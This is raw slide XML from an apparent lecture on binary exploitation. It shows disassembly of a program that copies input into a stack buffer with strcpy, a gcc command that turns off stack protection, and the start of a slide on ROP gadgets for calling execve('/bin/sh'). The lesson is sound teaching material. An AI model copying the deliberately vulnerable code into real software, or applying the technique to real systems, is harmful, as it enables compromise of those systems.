            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>347</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="190041"/>
            <a:ext cx="5832763" cy="666795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2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push </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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x3c,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xc(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0x4,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,0x4(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-0x32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0xa,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322202" y="5326464"/>
            <a:ext cx="7662440" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -Wall -static -O0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-protector -m32 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-boundary=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rwxrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>--- 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 716K Mar 22 22:43 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78822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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need to find gadgets in the binary that will perform different actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Essentially encode our shellcode into these gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What do we need to call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (just as we did with shellcode)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0xb in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; of "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; [&amp; of "/bin/</a:t>
            </a:r>
            <a:r>
